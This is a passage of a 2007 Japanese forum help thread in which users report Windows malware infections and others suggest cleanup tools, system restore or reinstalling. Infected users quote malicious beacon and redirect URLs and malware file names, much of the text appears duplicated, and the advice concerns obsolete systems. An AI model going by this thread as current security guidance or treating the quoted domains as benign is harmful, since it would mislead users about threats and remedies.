ttp://mswindowsupdate.info/work.php?test=7737&method=get&port=7994&id=1197938880&type=0&winver=Windows%20XP%20Service%20Pack%201&ver=partnership_26
にアクセス命令が出されているようです(感染後にウイルスバスターを入れて確認)
【症状が出る前に何をやったか】
家族で共有しているパソコンでどうやら親父が感染源らしく、俺には原因がわかりません。
ファイルを開いたりはしないと思うので、おそらく感染ページを踏んだものと思われます。
【症状を解決しようとどのような処置を取ったか】
ウイルスバスターを導入してウイルス・スパイボットを駆除
ウイルス発動時刻に作成されたファイルを全削除(comio32.dll、tmp0374.exe等)
サービスからieupdaterを無効に設定
safemodeで起動し、System32/PROTECTOR.EXEを削除
セキュリティホールを検出し、アップデート
【その他の質問】
現在はほぼ感染前と同じ状況になりましたが15分ごとに上のアドレスがファイアーウォールにかかるのと
起動時にinet20216/winlogon.exeが見つかりません。と表示されるのが気になります。
御願いします。
【使用OS】 WINDOWS XP
【MicrosoftUpdate】 してませんでした
【使用セキュリティソフト】 ウイルスバスター(感染後)
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
TROJ AGENT.DEL TROJ AGENT.SAD TROJ ZLOB.DSI etc...
【どんな症状が出るか】
起動・動作がもの凄く重くなり、IEに繋ぐと海外のセキュリティサイトに飛ばされて「今すぐインストール」みたいな表示が出ます。
System32フォルダ内のPROTECTOR.EXEが5秒ごとに動作しています(ファイアーウォールにかかりログが残ってます)
それから15分ごとに
ttp://mswindowsupdate.info/good_ip.php
ttp://mswindowsupdate.info/work.php?test=7737&method=get&port=7994&id=1197938880&type=0&winver=Windows%20XP%20Service%20Pack%201&ver=partnership_26
にアクセス命令が出されているようです(感染後にウイルスバスターを入れて確認)
【症状が出る前に何をやったか】
家族で共有しているパソコンでどうやら親父が感染源らしく、俺には原因がわかりません。
ファイルを開いたりはしないと思うので、おそらく感染ページを踏んだものと思われます。
【症状を解決しようとどのような処置を取ったか】
ウイルスバスターを導入してウイルス・スパイボットを駆除
ウイルス発動時刻に作成されたファイルを全削除(comio32.dll、tmp0374.exe等)
サービスからieupdaterを無効に設定
safemodeで起動し、System32/PROTECTOR.EXEを削除
セキュリティホールを検出し、アップデート
【その他の質問】
現在はほぼ感染前と同じ状況になりましたが15分ごとに上のアドレスがファイアーウォールにかかるのと
起動時にinet20216/winlogon.exeが見つかりません。と表示されるのが気になります。
御願いします。
716 :名無しさん@お腹いっぱい。:2007/02/03(土) 12:18:22
>【MicrosoftUpdate】 してませんでした
はぁ・・・・
はぁ・・・・
717 :名無しさん@お腹いっぱい。:2007/02/03(土) 19:00:03
>>715
hijack thisをつかってみてはいかが?
参考サイト置いとくよ
http://www.higaitaisaku.com/hijackthis.html
http://hijackthis.de/
> 起動時にinet20216/winlogon.exeが見つかりません。と表示されるのが気になります。
これで起動できてるのが不思議
hijack thisをつかってみてはいかが?
参考サイト置いとくよ
http://www.higaitaisaku.com/hijackthis.html
http://hijackthis.de/
> 起動時にinet20216/winlogon.exeが見つかりません。と表示されるのが気になります。
これで起動できてるのが不思議
718 : ◆N9P3SuvBPo :2007/02/03(土) 20:00:29
>717
>inet20216/winlogon.exe
winlogon.exeの正しいパスはc:\windows\system32\
inet20216/winlogon.exeはマルウェア(CWS系)
>715
ちょっとキツイなこれ…
>inet20216/winlogon.exe
winlogon.exeの正しいパスはc:\windows\system32\
inet20216/winlogon.exeはマルウェア(CWS系)
>715
ちょっとキツイなこれ…
>>718
失礼しました(汗
失礼しました(汗
720 :名無しさん@お腹いっぱい。:2007/02/03(土) 21:39:50
【使用OS】MacOS10.4
【MicrosoftUpdate】-
【使用セキュリティソフト】ClamXav
【セキュリティソフトの定義ファイルは最新の状態であるか】Yes
【ルータの有無】No
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】2ch上のレスのウィルスコードのみ
【どんな症状が出るか】何も出ない
【症状が出る前に何をやったか】踏むなと言われてるリンクを踏んでしまった
【症状を解決しようとどのような処置を取ったか】ClamXavでHDD全スキャンした
【その他の質問】Macでは動かないウィルスってことなんでしょうかね?特に異常
ありません。
【MicrosoftUpdate】-
【使用セキュリティソフト】ClamXav
【セキュリティソフトの定義ファイルは最新の状態であるか】Yes
【ルータの有無】No
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】2ch上のレスのウィルスコードのみ
【どんな症状が出るか】何も出ない
【症状が出る前に何をやったか】踏むなと言われてるリンクを踏んでしまった
【症状を解決しようとどのような処置を取ったか】ClamXavでHDD全スキャンした
【その他の質問】Macでは動かないウィルスってことなんでしょうかね?特に異常
ありません。
721 : ◆N9P3SuvBPo :2007/02/04(日) 00:02:30
MacってWindowsで動作するウイルスはほとんど動かないよ。
でも保菌はするけどね。
でも保菌はするけどね。
722 :名無しさん@お腹いっぱい。:2007/02/04(日) 02:00:48
>>717
どうもです。早速試してきます
>>718
ここに来るまでにいろいろググって頑張ってみたんだけど無理だった
inet20216/winlogon.exeがマルウェアとかも調べてわかったから削除したわけで
どうやらレジストリもいじらないといけないっぽいけどよくわからないorz
どうもです。早速試してきます
>>718
ここに来るまでにいろいろググって頑張ってみたんだけど無理だった
inet20216/winlogon.exeがマルウェアとかも調べてわかったから削除したわけで
どうやらレジストリもいじらないといけないっぽいけどよくわからないorz
723 :名無しさん@お腹いっぱい。:2007/02/04(日) 03:10:27
【使用OS】 XP pro sp2
【MicrosoftUpdate】 ○
【使用セキュリティソフト】 ×
【セキュリティソフトの定義ファイルは最新の状態であるか】 ×
【ルータの有無】 ○
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
トレンドマイクロオンラインスキャン→異常無し
Ad-Aware→異常無し
YamadaChkTool→「Hostsが改変されています。」メッセージ
【どんな症状が出るか】
hostsファイルに0.0.0.0 avp.ch 〜 0.0.0.0 liveupdate.symantecliveupdate.com の値が書き込まれて、
書き込まれたサイトにアクセスできない。MicrosoftUpdateはできます。
【症状が出る前に何をやったか】
P2Pのファイルの何かを踏んでしまったようです・・・
【症状を解決しようとどのような処置を取ったか】
hosts内の値を削除。hosts自体を削除。値を削除し、読み取り専用にしたhostsを上書き。
上の3つを試してみましたが、いずれも、すぐに書き換えられてしまいます。
どうも、Win32.HLLW.Antinny.6 か、Win32.Mydoom.B に感染し、駆除が中途半端だったようです・・・
ご教授お願いします。
【その他の質問】
【MicrosoftUpdate】 ○
【使用セキュリティソフト】 ×
【セキュリティソフトの定義ファイルは最新の状態であるか】 ×
【ルータの有無】 ○
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
トレンドマイクロオンラインスキャン→異常無し
Ad-Aware→異常無し
YamadaChkTool→「Hostsが改変されています。」メッセージ
【どんな症状が出るか】
hostsファイルに0.0.0.0 avp.ch 〜 0.0.0.0 liveupdate.symantecliveupdate.com の値が書き込まれて、
書き込まれたサイトにアクセスできない。MicrosoftUpdateはできます。
【症状が出る前に何をやったか】
P2Pのファイルの何かを踏んでしまったようです・・・
【症状を解決しようとどのような処置を取ったか】
hosts内の値を削除。hosts自体を削除。値を削除し、読み取り専用にしたhostsを上書き。
上の3つを試してみましたが、いずれも、すぐに書き換えられてしまいます。
どうも、Win32.HLLW.Antinny.6 か、Win32.Mydoom.B に感染し、駆除が中途半端だったようです・・・
ご教授お願いします。
【その他の質問】
724 : ◆N9P3SuvBPo :2007/02/04(日) 03:19:50
>723
明日、YES!プリキュア5見たら
すぐにリカバリだ。
そもそもセキュリティソフト無しでP2Pやるってお前www
まあセキュリティソフトがあっても
偽装された実行ファイルを踏んでもダメだけどね。
明日、YES!プリキュア5見たら
すぐにリカバリだ。
そもそもセキュリティソフト無しでP2Pやるってお前www
まあセキュリティソフトがあっても
偽装された実行ファイルを踏んでもダメだけどね。
725 :名無しさん@お腹いっぱい。:2007/02/04(日) 11:46:25
>>88
kasuあの世いけ
kasuあの世いけ
726 :名無しさん@お腹いっぱい。:2007/02/04(日) 13:23:54
ノーガードの猛者が多いなw
727 :名無しさん@お腹いっぱい。:2007/02/04(日) 13:37:04
そうとうセキュリティーに自身があるんだろうな。
728 :名無しさん@お腹いっぱい。:2007/02/04(日) 13:40:55
ダウソにスレあるだろ
そっちでやれよ
そっちでやれよ
729 :名無しさん@お腹いっぱい。:2007/02/04(日) 16:46:44
【使用OS】windows xp homeedition
【MicrosoftUpdate】-
【使用セキュリティソフト】norton antivirus
【セキュリティソフトの定義ファイルは最新の状態であるか】Yes
【ルータの有無】yes
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されません
【どんな症状が出るか】右クリックを押すだけで「win fixer」と言うウィルスが反応します
【症状が出る前に何をやったか】特に変なことをやって記憶がないです
【症状を解決しようとどのような処置を取ったか】システム完全スキャンを何度も行った。
【その他の質問】別スレで質問を行ったところ、ここへ誘導されました。
winfixer が邪魔でしょうがないです。どうすれば除去できますか。。
教えてください。
【MicrosoftUpdate】-
【使用セキュリティソフト】norton antivirus
【セキュリティソフトの定義ファイルは最新の状態であるか】Yes
【ルータの有無】yes
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されません
【どんな症状が出るか】右クリックを押すだけで「win fixer」と言うウィルスが反応します
【症状が出る前に何をやったか】特に変なことをやって記憶がないです
【症状を解決しようとどのような処置を取ったか】システム完全スキャンを何度も行った。
【その他の質問】別スレで質問を行ったところ、ここへ誘導されました。
winfixer が邪魔でしょうがないです。どうすれば除去できますか。。
教えてください。
730 :名無しさん@お腹いっぱい。:2007/02/04(日) 16:52:23
【使用OS】 Windows 2000
【MicrosoftUpdate】 ○
【使用セキュリティソフト】 マカティ最新版
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 たぶん、OK
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 なし
【どんな症状が出るか】 SAService.exe起動失敗しましたというエラーが続出
【症状が出る前に何をやったか】 インターネットラジオを聞いたくらい。あとはわからない。
【症状を解決しようとどのような処置を取ったか】 セーフモードにして、トレンドクリーナーした。
【その他の質問】
これはウィルスなのか、PCが壊れたのかよくわからないです。
【MicrosoftUpdate】 ○
【使用セキュリティソフト】 マカティ最新版
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 たぶん、OK
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 なし
【どんな症状が出るか】 SAService.exe起動失敗しましたというエラーが続出
【症状が出る前に何をやったか】 インターネットラジオを聞いたくらい。あとはわからない。
【症状を解決しようとどのような処置を取ったか】 セーフモードにして、トレンドクリーナーした。
【その他の質問】
これはウィルスなのか、PCが壊れたのかよくわからないです。
731 :名無しさん@お腹いっぱい。:2007/02/04(日) 18:45:27
【使用OS】Windows 2001
【MicrosoftUpdate】 今年に入ってからしていない気が
【使用セキュリティソフト】avast!
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されず
【どんな症状が出るか】
今特になにが起こっているわけではないので、よくわかりませんが
ファイルを検索してみたら.dbxファイルが修正されていました
【症状が出る前に何をやったか】
メールを開いたら、画像へのリンクがあり、慌てて閉じ削除しましたが、じきにカツカツカツピコピコと音がして挙動がおかしくなりました。
【症状を解決しようとどのような処置を取ったか】
再起動、オンラインウィルススキャン、オンラインセキュリティチェック、avast!でのスキャン、修正されたファイルのチェック
【その他の質問】
一時的に挙動が少しおかしくなった以外には、特に何か今自覚症状があるわけではないのですが
.dbxファイルが一様に修正されているという事は何かやられてしまったのでしょうか。
なにがやられてしまったのか、どう対処すればよいのかご教授お願いいたします。
【MicrosoftUpdate】 今年に入ってからしていない気が
【使用セキュリティソフト】avast!
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されず
【どんな症状が出るか】
今特になにが起こっているわけではないので、よくわかりませんが
ファイルを検索してみたら.dbxファイルが修正されていました
【症状が出る前に何をやったか】
メールを開いたら、画像へのリンクがあり、慌てて閉じ削除しましたが、じきにカツカツカツピコピコと音がして挙動がおかしくなりました。
【症状を解決しようとどのような処置を取ったか】
再起動、オンラインウィルススキャン、オンラインセキュリティチェック、avast!でのスキャン、修正されたファイルのチェック
【その他の質問】
一時的に挙動が少しおかしくなった以外には、特に何か今自覚症状があるわけではないのですが
.dbxファイルが一様に修正されているという事は何かやられてしまったのでしょうか。
なにがやられてしまったのか、どう対処すればよいのかご教授お願いいたします。
732 :名無しさん@お腹いっぱい。:2007/02/04(日) 18:56:45
マカティとかWindows 2001とか、笑わせてもらってありがとう。
すいませんほんと間違いです。
ひきつづきよろしくおねがいいたします。
ひきつづきよろしくおねがいいたします。
734 :名無しさん@お腹いっぱい。:2007/02/04(日) 19:08:26
735 :名無しさん@お腹いっぱい。:2007/02/04(日) 19:37:36
ウイルス検索でこんなんでましたが→TROJ_HARADONG.AB
さっぱりわかりません
おしえてエロい人
さっぱりわかりません
おしえてエロい人
736 :名無しさん@お腹いっぱい。:2007/02/04(日) 20:00:52
>>729
リンク先嫁。
http://pc10.2ch.net/test/read.cgi/sec/1169637313/367
>>735
アンチウイルスの種類ぐらい書くのは常識。
TROJ_HARADONG.AB
役立つ情報なし
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EAB&VSect=P
亜種の情報
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EF&VSect=P
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EAU&VSect=P
亜種はブラウザとノートンのファイルを削除するとのこと。
リンク先嫁。
http://pc10.2ch.net/test/read.cgi/sec/1169637313/367
>>735
アンチウイルスの種類ぐらい書くのは常識。
TROJ_HARADONG.AB
役立つ情報なし
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EAB&VSect=P
亜種の情報
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EF&VSect=P
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EAU&VSect=P
亜種はブラウザとノートンのファイルを削除するとのこと。
737 :名無しさん@お腹いっぱい。:2007/02/04(日) 20:13:19
訂正
誤 亜種はブラウザとノートンのファイルを削除するとのこと。
正 亜種はブラウザとノートンのファイルの削除に失敗するとのこと。
誤 亜種はブラウザとノートンのファイルを削除するとのこと。
正 亜種はブラウザとノートンのファイルの削除に失敗するとのこと。
739 :名無しさん@お腹いっぱい。:2007/02/04(日) 20:36:54
>>736
ありがとうございました!長い間悩んでいましたが見事解決しました。
ありがとうございました!長い間悩んでいましたが見事解決しました。
741 :名無しさん@お腹いっぱい。:2007/02/04(日) 22:50:08
携帯から失礼します
先日とある海外サイトを踏み広告等が出てきたりして
いきなり強制的にデスクトップも変わってしまいました、画面は真っ黒で英字で「Your computer is in Danger!」など書かれています
デスクトップ変更の操作をしようとしても何故か無理でした
一応ウィルスのチェックをしたら感染してたみたいなので駆除しましたが
デスクトップは相変わらずの状態なんです
これもウィルスの影響なのか何なのか…PC初心者なのでよくわかりません
何かわかる方、よろしくお願いします
先日とある海外サイトを踏み広告等が出てきたりして
いきなり強制的にデスクトップも変わってしまいました、画面は真っ黒で英字で「Your computer is in Danger!」など書かれています
デスクトップ変更の操作をしようとしても何故か無理でした
一応ウィルスのチェックをしたら感染してたみたいなので駆除しましたが
デスクトップは相変わらずの状態なんです
これもウィルスの影響なのか何なのか…PC初心者なのでよくわかりません
何かわかる方、よろしくお願いします
742 :名無しさん@お腹いっぱい。:2007/02/05(月) 00:08:36
なんかこいつのレスみたことあるような希ガス
743 : ◆N9P3SuvBPo :2007/02/05(月) 00:09:23
>741
初心者なりによく頑張った。
次にすることは、リカバリ。
初心者なりによく頑張った。
次にすることは、リカバリ。
744 :名無しさん@お腹いっぱい。:2007/02/05(月) 14:23:27
【使用OS】Windows ME
【MicrosoftUpdate】 たぶんしてないと
【使用セキュリティソフト】ウィルスセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】なし
【どんな症状が出るか】 ハードディスクアクセスランプがしばらくすると点灯しつづける
【症状が出る前に何をやったか】 ゲームの体験版をやった
【症状を解決しようとどのような処置を取ったか】 ウィルスバスターオンラインでは出ず、X-Cleanerの無料ので
Troj.SVwhostが出たので駆除。
しかしまだハードディスクアクセスランプがしばらくすると点灯しつづけるので、ウィルスセキュリティを買ってスキャンしても出ず。
どうすればいいか解りません。ご教授お願いします。
【MicrosoftUpdate】 たぶんしてないと
【使用セキュリティソフト】ウィルスセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】なし
【どんな症状が出るか】 ハードディスクアクセスランプがしばらくすると点灯しつづける
【症状が出る前に何をやったか】 ゲームの体験版をやった
【症状を解決しようとどのような処置を取ったか】 ウィルスバスターオンラインでは出ず、X-Cleanerの無料ので
Troj.SVwhostが出たので駆除。
しかしまだハードディスクアクセスランプがしばらくすると点灯しつづけるので、ウィルスセキュリティを買ってスキャンしても出ず。
どうすればいいか解りません。ご教授お願いします。
745 :名無しさん@お腹いっぱい。:2007/02/05(月) 15:03:13
>>744
>【MicrosoftUpdate】 たぶんしてないと
ここはせめてWindowsセキュリティセンターで、「自動」にして最新状態を保ちましょう
タスクマネージャーを立ち上げて、キャプチャソフトでキャプチャして画像upできますか?
>【MicrosoftUpdate】 たぶんしてないと
ここはせめてWindowsセキュリティセンターで、「自動」にして最新状態を保ちましょう
タスクマネージャーを立ち上げて、キャプチャソフトでキャプチャして画像upできますか?
746 :名無しさん@お腹いっぱい。:2007/02/05(月) 15:42:25
MEにはそれすら無いのか・・・
749 :名無しさん@お腹いっぱい。:2007/02/05(月) 16:10:06
こういうのもある
この前雑誌に載ってたよ
ProcessWalker 4.2b プロセスの情報を表示するGUIツール
http://www.vector.co.jp/soft/winnt/util/se221254.html
この前雑誌に載ってたよ
ProcessWalker 4.2b プロセスの情報を表示するGUIツール
http://www.vector.co.jp/soft/winnt/util/se221254.html
750 :名無しさん@お腹いっぱい。:2007/02/05(月) 16:21:35
Windows Me で最低限必要なセキュリティ対策 - 自動アップデート
http://www.microsoft.com/japan/athome/security/protect/windowsme/updates.mspx
http://www.microsoft.com/japan/athome/security/protect/windowsme/updates.mspx
ProcessExplorerは作者のHPの一番下にあるDownload Process Explorer (1.5 MB)でいいんでしょうか?
いろいろ見て回ったらOSに合わせてあるようなのですが
一番下にしかないようなのですけれど
いろいろ見て回ったらOSに合わせてあるようなのですが
一番下にしかないようなのですけれど
752 :名無しさん@お腹いっぱい。:2007/02/05(月) 16:59:22
>>744
ProcessExploreもProcessWalkerも機能的にはそんなに差がないようだから
日本人が作ってるProcessWalkerのが日本語インターフェイスなんで解かりやすいと思うよ
ProcessExploreもProcessWalkerも機能的にはそんなに差がないようだから
日本人が作ってるProcessWalkerのが日本語インターフェイスなんで解かりやすいと思うよ
753 :名無しさん@お腹いっぱい。:2007/02/05(月) 17:10:18
>>752
MEじゃ使えないみたい
MEじゃ使えないみたい
754 :名無しさん@お腹いっぱい。:2007/02/05(月) 18:04:20
WindowsXPなんだけ再インストールしてからウィルスバスターが何度も同じウィルスをあり得ない速度でブロックしまくってんだけど何で?
ウィルス名は覚えてないけどセキュリティーホールを攻撃するタイプらしいです。
しかも自棄にネット重くなるし
ウィルス名は覚えてないけどセキュリティーホールを攻撃するタイプらしいです。
しかも自棄にネット重くなるし
755 : ◆N9P3SuvBPo :2007/02/05(月) 18:04:26
>744
>Troj.SVwhost …Hostsファイル書き換えのトロイ?
MEのサポートは終わったけど、まだ「緊急レベルの更新」が配布されてるよ。
今確認すべきことは、マイクロソフトのサイトに繋がるかどうかだね。
補足:MEの初期ブラウザってIE6SP無しVer?
>Troj.SVwhost …Hostsファイル書き換えのトロイ?
MEのサポートは終わったけど、まだ「緊急レベルの更新」が配布されてるよ。
今確認すべきことは、マイクロソフトのサイトに繋がるかどうかだね。
補足:MEの初期ブラウザってIE6SP無しVer?
757 :名無しさん@お腹いっぱい。:2007/02/05(月) 19:13:20
>>754
MicrosoftUpdateしたほうがいいよ
MicrosoftUpdateしたほうがいいよ
758 : ◆N9P3SuvBPo :2007/02/05(月) 19:24:49
>756
とりあえずウイルスを駆除してからだな。
>ハードディスクアクセスランプがしばらくすると点灯しつづける
この症状が無くなってから、全部インストールしたほうがいいと思う。
HijackThisのログを頼む
とりあえずウイルスを駆除してからだな。
>ハードディスクアクセスランプがしばらくすると点灯しつづける
この症状が無くなってから、全部インストールしたほうがいいと思う。
HijackThisのログを頼む
どうやら操作してる最中は点灯せず
なにもせず放っておくと点灯し続けるみたいです
そうするとネットを起動すると重くなり、一回閉じてもう一度やると普通に見れるみたいです
なにもせず放っておくと点灯し続けるみたいです
そうするとネットを起動すると重くなり、一回閉じてもう一度やると普通に見れるみたいです
760 :名無しさん@お腹いっぱい。:2007/02/05(月) 20:07:57
グーグルで検索してるたまに変なページに飛ばされることがあります
↓のページです
http://www.hotwebfinder.info/search.php?q=%93%A1%88%E4%83t%83%7E%83%84
ウィルス原因なんでしょうか?
解決法とかあるでしょうか?
↓のページです
http://www.hotwebfinder.info/search.php?q=%93%A1%88%E4%83t%83%7E%83%84
ウィルス原因なんでしょうか?
解決法とかあるでしょうか?
hotwebfinderっていうウィルス?らしいです
グーグル検索時のみリンク先が変更されてしまいます
グーグル検索時のみリンク先が変更されてしまいます
762 : ◆N9P3SuvBPo :2007/02/05(月) 20:36:59
>759
>なにもせず放っておくと点灯し続けるみたいです
これ、普通ではありえない現象
この症状を自力(執念)で解決できる力はある?
>なにもせず放っておくと点灯し続けるみたいです
これ、普通ではありえない現象
この症状を自力(執念)で解決できる力はある?
763 :名無しさん@お腹いっぱい。:2007/02/05(月) 20:44:13
【使用OS】 XP
【MicrosoftUpdate】 今日しました
【使用セキュリティソフト】 avast
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無
【スキャンの結果何が検出されたか】 トロイ一個、アドウェア一個
【どんな症状が出るか】 グーグル検索すると、hotwebfinderというページに飛ばされる
【症状が出る前に何をやったか】 わからない・・・
【症状を解決しようとどのような処置を取ったか】 窓更新、avast更新
【その他の質問】 ググっても情報が少ないです
【MicrosoftUpdate】 今日しました
【使用セキュリティソフト】 avast
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無
【スキャンの結果何が検出されたか】 トロイ一個、アドウェア一個
【どんな症状が出るか】 グーグル検索すると、hotwebfinderというページに飛ばされる
【症状が出る前に何をやったか】 わからない・・・
【症状を解決しようとどのような処置を取ったか】 窓更新、avast更新
【その他の質問】 ググっても情報が少ないです
765 :名無しさん@お腹いっぱい。:2007/02/05(月) 21:42:42
>>764
1、ブラウザ(IE)のツールバー ツール(T)>アドオンの管理>現在読み込まれている「アドオン」はどんなものがありますか?
2、信頼済みサイトに見に覚えの無いURLが登録されていませんか?
3、セキュリティーゾーンの設定内容がいつの間にか変わっていませんか?
非常駐のウイルス駆除ソフトのBitDefender、
フリーのスパイウェア対策駆除のSpywareBlaster、Ad-aware SE、Spybot-S&D も入れておいたほうがいいと思います。
ブラウザの設定に虚弱があれば再感染するかもしれませんけど。
1、ブラウザ(IE)のツールバー ツール(T)>アドオンの管理>現在読み込まれている「アドオン」はどんなものがありますか?
2、信頼済みサイトに見に覚えの無いURLが登録されていませんか?
3、セキュリティーゾーンの設定内容がいつの間にか変わっていませんか?
非常駐のウイルス駆除ソフトのBitDefender、
フリーのスパイウェア対策駆除のSpywareBlaster、Ad-aware SE、Spybot-S&D も入れておいたほうがいいと思います。
ブラウザの設定に虚弱があれば再感染するかもしれませんけど。
766 :名無しさん@お腹いっぱい。:2007/02/05(月) 22:09:55
>>765
@
http://up2.viploader.net/pic/src/viploader409286.jpg
http://up2.viploader.net/pic/src/viploader409287.jpg
ヤバイものありますか?
A
ありません
B
変わって無いと思います
スパイウェア対策して再度報告します
@
http://up2.viploader.net/pic/src/viploader409286.jpg
http://up2.viploader.net/pic/src/viploader409287.jpg
ヤバイものありますか?
A
ありません
B
変わって無いと思います
スパイウェア対策して再度報告します
768 :名無しさん@お腹いっぱい。:2007/02/05(月) 22:25:32
>>766
@のアドオンの中の、発行元の記載の無いアドオンの・・・
「ipv6mote.dll」と「tlctw32.dll」でググると、CastleCopsというサイトがヒットして、
Filename:「ipv6mote.dll」
Description(解説):Variant of the Infostealer.Bzup trojan
Filename:「tlctw32.dll」
Description(解説):Backdoor trojan, a variant of Trojan-Spy.Win32.Agent.ir
となっていますんで
とりあえずアドオンの管理で読み込み無効にしてから駆除でしょう
@のアドオンの中の、発行元の記載の無いアドオンの・・・
「ipv6mote.dll」と「tlctw32.dll」でググると、CastleCopsというサイトがヒットして、
Filename:「ipv6mote.dll」
Description(解説):Variant of the Infostealer.Bzup trojan
Filename:「tlctw32.dll」
Description(解説):Backdoor trojan, a variant of Trojan-Spy.Win32.Agent.ir
となっていますんで
とりあえずアドオンの管理で読み込み無効にしてから駆除でしょう
769 :名無しさん@お腹いっぱい。:2007/02/05(月) 23:07:28
>>767
1.まずウィルスバスターオンライン以外のオンラインスキャンをしてみる。
2.wordやexcelを使用しているのならoffice update もしておく。
3.アンチウイルスをウィルスセキュリティ以外の9x系が使用可能なものにする。
とりあえずは、せっかく758が見てくれるといってくれているのだから
http://pc10.2ch.net/test/read.cgi/sec/1091346741/1を参考にHijackThisを入手実行すれば?
再インスコするなら今年の6月か7月でwindows updateのアーカイブが削除されるはずだから
windows updateしたときIEのキャッシュからupdateファイルを拾ってCD-Rにでも焼いておけば安心だろう
1.まずウィルスバスターオンライン以外のオンラインスキャンをしてみる。
2.wordやexcelを使用しているのならoffice update もしておく。
3.アンチウイルスをウィルスセキュリティ以外の9x系が使用可能なものにする。
とりあえずは、せっかく758が見てくれるといってくれているのだから
http://pc10.2ch.net/test/read.cgi/sec/1091346741/1を参考にHijackThisを入手実行すれば?
再インスコするなら今年の6月か7月でwindows updateのアーカイブが削除されるはずだから
windows updateしたときIEのキャッシュからupdateファイルを拾ってCD-Rにでも焼いておけば安心だろう
771 : ◆N9P3SuvBPo :2007/02/06(火) 00:11:41
>770
見たけど、とくに異常な個所は見当たりません。
下記のソフトでスキャンする前に、システムの復元を試してみてください。
(システムの復元はセーフモードで行うこと)
Ad-Aware SEと
ttp://www.higaitaisaku.com/adaware.html
SpyBot S&Dの作業で
ttp://www.higaitaisaku.com/spybot2.html
なんとかなると思います。
最新の定義ファイルに更新して、
・通常モード
・セーフモード
の両方でスキャンしてみてください。
解決したら予防を
ttp://www.higaitaisaku.com/korobanu.html
見たけど、とくに異常な個所は見当たりません。
下記のソフトでスキャンする前に、システムの復元を試してみてください。
(システムの復元はセーフモードで行うこと)
Ad-Aware SEと
ttp://www.higaitaisaku.com/adaware.html
SpyBot S&Dの作業で
ttp://www.higaitaisaku.com/spybot2.html
なんとかなると思います。
最新の定義ファイルに更新して、
・通常モード
・セーフモード
の両方でスキャンしてみてください。
解決したら予防を
ttp://www.higaitaisaku.com/korobanu.html
772 : ◆N9P3SuvBPo :2007/02/06(火) 00:25:09
もう寝るか…
773 :名無しさん@お腹いっぱい。:2007/02/06(火) 00:28:49
775 :名無しさん@お腹いっぱい。:2007/02/06(火) 01:18:13
【使用OS】windows XP
【MicrosoftUpdate】していません
【使用セキュリティソフト】avast
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Win32:Agent-DHX[Trj]とWin32:Agent-BPB [Trj]
【どんな症状が出るか】ローカルディスク、Cディスクなんですが、普通はダブルクリックするとディスクを開きますよね。
それが、ダブルクリックするといきなりavastがウイルスを検出し始めます。
Cディスクが「開く」ではなく「自動再生」に変えられてしまっていて、
クリックすることでウイルスを動かしてしまうようです・・・・orz
【症状が出る前に何をやったか】すいません、覚えてないです。何か怪しいexeを踏んだとかではないです。
【症状を解決しようとどのような処置を取ったか】avastでディスクスキャンしてチェストへ移動させた。ad-awareとspybotも使ってみました。
【その他の質問】Cディスクを開こうとする度にウイルスが検出され始めてしまって駆除する方法が分からないです。
ググッてみてもいまいち症状が分からない・・・・
よろしくお願いします
【MicrosoftUpdate】していません
【使用セキュリティソフト】avast
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Win32:Agent-DHX[Trj]とWin32:Agent-BPB [Trj]
【どんな症状が出るか】ローカルディスク、Cディスクなんですが、普通はダブルクリックするとディスクを開きますよね。
それが、ダブルクリックするといきなりavastがウイルスを検出し始めます。
Cディスクが「開く」ではなく「自動再生」に変えられてしまっていて、
クリックすることでウイルスを動かしてしまうようです・・・・orz
【症状が出る前に何をやったか】すいません、覚えてないです。何か怪しいexeを踏んだとかではないです。
【症状を解決しようとどのような処置を取ったか】avastでディスクスキャンしてチェストへ移動させた。ad-awareとspybotも使ってみました。
【その他の質問】Cディスクを開こうとする度にウイルスが検出され始めてしまって駆除する方法が分からないです。
ググッてみてもいまいち症状が分からない・・・・
よろしくお願いします
776 :名無しさん@お腹いっぱい。:2007/02/06(火) 08:51:19
777 :名無しさん@お腹いっぱい。:2007/02/06(火) 09:45:28
【使用OS】 XP Pro SP2
【MicrosoftUpdate】 自動通知
【使用セキュリティソフト】 AVG free
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 有
